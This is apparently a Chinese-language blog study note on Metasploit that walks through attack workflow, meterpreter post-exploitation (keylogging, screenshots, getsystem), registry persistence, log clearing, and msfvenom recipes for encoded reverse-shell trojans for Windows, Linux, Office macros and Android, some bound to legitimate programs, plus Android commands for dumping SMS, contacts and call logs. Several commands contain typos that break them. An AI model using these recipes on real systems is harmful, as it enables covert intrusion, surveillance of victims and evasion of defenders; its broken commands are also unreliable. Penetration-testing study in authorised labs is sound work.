MSF(Metasploit)学习笔记

知道MSF好久了,全称是metasploit ,可以自行安装,不过一般直接使用kali里的,不过一直以来没有记录感觉没有很好的掌握,来浅浅记录一次吧!

启动

有三种启动方式,msf可以直接使用,不一定要启动数据库

  1. 启动数据库的后再启动msf
    systemctl start postgresql
    msfconsole
  2. 启动数据库,同时启动msf
    msfdb run
  3. 只启动msf
    msfconsole

简单使用

  1. 获取帮助
    help
    ?
  2. 搜索`search`语法
    type:
    path:
    name:
    rank:
    platform:
  3. 使用某个模块
    use xxx
  4. 查看相关参数的设置
    show options
  5. 查看模块信息
    info
  6. 需要需要填写的参数
    show missing
  7. 显示可攻击的目标
    show targets
  8. 退出模块
    back
  9. 设置/取消设置选项中的参数
    set/unset
  10. 开始攻击
    exploit/run

攻击流程

  1. 搜索漏洞相关
    search ms17-010
  2. 选择模块
    use xxx
  3. 设置参数
    set rhosts xxx
  4. 发起攻击
    run/exploit

    挂到成功后挂到后台

    exploit -j

信息收集

  1. db_nmap扫描
    db_nmap -sP 192.168.79.0/24
    db_nmap -sT 192.168.79.0/24
    db_nmap -sV 192.168.79.0/24
  2. 查找漏洞
    nmap --scripts=vuln 192.168.79.134 
  3. 查找CVE 模块 配置参数 设置payload

 

meterpreter

攻击成功后就会进入`meterpreter`界面

  • 常用命令
    background
    sessions
    ps
    getuid
    sysinfo
    getsystem
    getpid
    execute -f 1.exe
    upload xxx c:\\
    run scraper
    cd cat rm edit
    run post/windows/gather/enum_applications
    screenshot
    keyscan_start keysacn_dump keyscan_stop
    run vnc
  • 进程迁移 后可以进行该进程的 键盘监听
    migrate pid(424)
  • 遇到的问题
    • vnc 不能交互,在目录/usr/share/metasploit-framework/scripts/meterpreter/,下找到vnc.rb文件
      pay声明的位置添加

      pay.datastore['ViewOnly'] = false

生成持续性后门

  1. 注册表的方式,设置参数
    use exploit/windows/local/persistence
    set 
    set 
    run
  2. 监听端口
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 192.168.79.131
  3. 清除日志
    clearev

制作windows恶意软件

  1. 一次编码生成exe木马
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.79.131 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/1.exe
  2. 两次编码生成exe木马
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.79.131 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 20 |msfvenom -a x86 --platform -e x86/alpha_upper -i 10 -f exe -o /var/www/html/2.exe
  3. 绑定的真实的程序,非主程序
    msfvenom -a x86 --platform windows -p windows/meterpreter_tcp LHOST=192.168.79.131 LPORT=4444 -b "\x00" -e x86/shikatu_ga_nai -i 10 -x xxx.exe -f exe -o /var/www/html/3.exe

制作Linux恶意软件

  1. 制作
    msfvenom -a x64 --platform linux -p linux/x64/meterpereter/reverse_tcp LHOST=192.168.79.131 LPORT=4444 -b "\x00" -i 10 -f elf -o /var/www/html/msb
  2. 开启监听
    use exploit/multi/handler
    set payload linux/x64/meterpreter/reverse_tcp
    run

制作文档宏病毒

  1. 生成宏和payload
    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.79.131 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 10 -f vba-exe
  2. 新建文档,复制宏,和payload到内容
  3. 开启监听
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    run

制作安卓木马

  1. 生成apk
    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.1168.79.131 LPORT=4444 R > a.apk
  2. 开启监听
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    run
  3. 使用-x参数添加模板应用时,会报错,不能正常生成
  4. 使用github的项目来使用模板apk来生成木马apk源代码仓库

 

常见的anroid指令

check_root
dump_calllog
dump_contracts
dump_sms
geolocate
send_sms
wlan_geolocate
app_install
app_list
app_run
app_uninstall

 

阅读剩余
THE END